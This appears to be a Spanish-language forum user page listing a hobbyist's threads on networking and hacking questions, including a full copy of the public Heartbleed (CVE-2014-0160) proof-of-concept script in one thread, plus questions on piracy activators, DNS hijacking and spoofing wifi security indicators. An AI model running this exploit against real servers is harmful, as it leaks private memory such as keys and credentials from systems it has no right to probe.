Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - roothelp

#1
Windows / kmspico tiene virus
24 Diciembre 2015, 18:13 PM
El caso es que quiero activar windows 10 pero veo en sitios web que tiene virus, yo he testteado varios con virustotal y la verdad que salen bastantes. Realmente es asi o es una artimaña para que no activemos windows de manera ilegal???
Gracias de antemano.
#2
Es curioso si te conectas a wifi tipo mcdonals, hoteles y demas, cuando haces un nmap -sP y el ramgo que quieres escanear, no aparece ninguna ip salvo la tuya y la dlel router. Pero lo curioso que antes esto no ocurria, ¿porque ocurre esto alguien sabe como consiguen ocultar el resto de los usuarios que estan conectados.?
#3
En security focus esta este exploit, pero no se si es para averiguar si el servidor esta afectado por el bug o es para explotar la vulnerabilidad:

#!/usr/bin/python

# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford
(jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.

import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser

options = OptionParser(usage='%prog server [options]', description='Test
for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP
port to test (default: 443)')

def h2bin(x):
return x.replace(' ', '').replace('\n', '').decode('hex')

hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')

hb = h2bin('''
18 03 02 00 03
01 40 00
''')

def hexdump(s):
for b in xrange(0, len(s), 16):
lin = [c for c in s[b : b + 16]]
hxdat = ' '.join('%02X' % ord(c) for c in lin)
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
print ' %04x: %-48s %s' % (b, hxdat, pdat)
print

def recvall(s, length, timeout=5):
endtime = time.time() + timeout
rdata = ''
remain = length
while remain > 0:
rtime = endtime - time.time()
if rtime < 0:
return None
r, w, e = select.select(, [], [], 5)
if s in r:
data = s.recv(remain)
# EOF?
if not data:
return None
rdata += data
remain -= len(data)
return rdata

def recvmsg(s):
hdr = recvall(s, 5)
if hdr is None:
print 'Unexpected EOF receiving record header - server closed
connection'
return None, None, None
typ, ver, ln = struct.unpack('>BHH', hdr)
pay = recvall(s, ln, 10)
if pay is None:
print 'Unexpected EOF receiving record payload - server closed
connection'
return None, None, None
print ' ... received message: type = %d, ver = %04x, length = %d' %
(typ, ver, len(pay))
return typ, ver, pay

def hit_hb(s):
s.send(hb)
while True:
typ, ver, pay = recvmsg(s)
if typ is None:
print 'No heartbeat response received, server likely not vulnerable'
return False

if typ == 24:
print 'Received heartbeat response:'
hexdump(pay)
if len(pay) > 3:
print 'WARNING: server returned more data than it should - server is
vulnerable!'
else:
print 'Server processed malformed heartbeat, but did not return any
extra data.'
return True

if typ == 21:
print 'Received alert:'
hexdump(pay)
print 'Server returned error, likely not vulnerable'
return False

def main():
opts, args = options.parse_args()
if len(args) < 1:
options.print_help()
return

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Connecting...'
sys.stdout.flush()
s.connect((args[0], opts.port))
print 'Sending Client Hello...'
sys.stdout.flush()
s.send(hello)
print 'Waiting for Server Hello...'
sys.stdout.flush()
while True:
typ, ver, pay = recvmsg(s)
if typ == None:
print 'Server closed connection without sending Server Hello.'
return
# Look for server hello done message.
if typ == 22 and ord(pay[0]) == 0x0E:
break

print 'Sending heartbeat request...'
sys.stdout.flush()
s.send(hb)
hit_hb(s)

if __name__ == '__main__':
main()

¿Alguno lo habeis utilizado?, yo lo he ejecutado pero me da error en el parser, no se si es porque hay que modificar algo en el codigo o porque no le meto parametros y por eso peta el script.
#4
Redes / crear un nodo tor con ubuntu server
8 Marzo 2014, 11:56 AM
Me gustaria crear un nodo tor en un pentium III a 600 Mzh con 256 megas de ram y que ejecuta ubuntu server 12.04  El caso que he leido que con vidalia y abriendo los puertos del router, se puede hacer pero vidalia funciona en modo grafico y no veo que se pueda configurar con el bash de linux. ¿hay alguna manera de hacerlo?.
Por otro lado un equipo con tan pocos recursos podria soportar el trafico que viaja a traves de la red tor sin saturarse.
Un saludo.
 
#5
el caso es que en un curro han puesto un router o firewall de la marca fortinet que cuando te conectas a el te pide una clave wpa. En esa oficina hay 10 personas, pues cada una tiene una clave wpa distinta y cuando acceder a la red wifi tienen que meter una clave distinta (cada una la suya). NO es el tipico HOtspot de macdonals o de ayuntamiento donde accedes a una red libre y cuando pones el navegador tienes que aceptar las condiciones de uso o tienes que meter un user o pass en el navegador.
Esto es distinto, cuando selecionas la wifi tienes que meter la clave wpa y se la metes, pero lo curioso es que cada usuario tiene su propia clave wpa.
¿pueden ser estas claves wpa seguir algun tipo de patron, ya que son generadas pro un ordenador, no son claves generadas por un usuario?.
Gracias de antemano.
#6
Hola, me gustaria saber si se puede tener acceso a la red local de un router que consiguo tener acceso mediante su ip publica y gestionarlo mediante web, pero no puede ser mediante vpn ya que solo tengo acceso a el para su administracion pero no puedo acceder a los equipos que estan conectados a el via wifi ni instalarles ninguna aplicacion a los subsodichos equipos ni logicamente un servidor vpn.
Quizas pueda abrir en forward el puerto netbios en un equipo en concreto y acceder a sus recursos compartidos mediante la ip publica del router.
¿alguna idea, gracias de antemano?
#7
Redes / mac distintas para una misma ip
8 Octubre 2011, 12:40 PM
La verdad que vengo observando que cuando hago un scaneo con nmap me da una direccion ip y una mac pero cuando miro que mac le corresponde a cada ip a traves del firware del router me da otra mac distinta, lo miismo me ocurre escaneando redes con el paquete de utilidades aircrack (creo que es el airodump).
¿porque varia la mac si la ip es la misma?. Es algo que me ha sucedido con varias tarjetas wifi.
Gracias de antemano.
#8
El caso que quiero configurar BIND (servidor de DNS), para que cuando se meta una url sea la que sea siempre apunte a una ip, osease configurar un BIND y que aunque el cliente que tenga configurado mi DNS llame a google o yahoo o lo que sea siempre salga mi servidor apache.
¿Alguien sabe como hacerlo?, gracias de antemano.
#9
Me gustaria saber si es posible engañar a los sistemas operativos clientes sobre todo a VISTA y 7 que aparece como una admiracion diciendote que la red que te vas a conectar es insegura.
Osease que cree una red abierta wifi pero que aparezca como WEP aunque logicamente esta abierta.
Gracias de antemano.
#10
Seguridad / back track 4 ssh y vpn
18 Agosto 2010, 14:41 PM
El caso es que he instalado un virtual (con wmware de backtrack4), e intento acceder desde mi portatil al equipo de sobremesa donde esta la virtual de backtrack4, lo hago primero mediante ssh y tras conectarme y aceptar la RSA me pide una contraseña yo le meto por defecto la contraseña de root de backtrack 4 y me dice que no. ¿sabeis cual es la contraseña por defecto, ya que usuario no te pide?, el demonio que utiliza esta distri es el sshd.
Por vnc tambien intento conectar pero tambien me es imposible arranco el servidor de vnc en backtrack 4 que es el xtightvnc y luego en mi portatil meto en un cliente de tightvnc la ip de la virtual y me dice que no se puede conectar.
no tengo ningun problema de conexion con la virtual ya que tiene su propia ip y accedo a ella mediante ping, le he hecho un escaneo de puertos y los puertos estan abiertos tanto el de ssh como el de vnc pero estos son los errores que me dan por un lado el ssh con la password y el vnc que no puede.
Gracias de antemano.
#11
El caso es que estoy en una virtual intentando dejar inoperativo el windows vista, me refiero a que no arranque antes con windows xp dejaba los archivos del sistema ocultos que se vieran y luego borraba el boot.ini, el ntldr y demas y el sistema operativo ya no arrancaba, pero ahora con windows vista se que el arranque ha cambiado, intento buscar la carpeta /boot donde se encuentran se supone los archivos de arranque del S.O. pero no soy capaz, ¿alguien sabe como puedo localizarlos y si se pueden borrar con la misma facilidad que las versiones de windows anteriores?.
Gracias de antemano.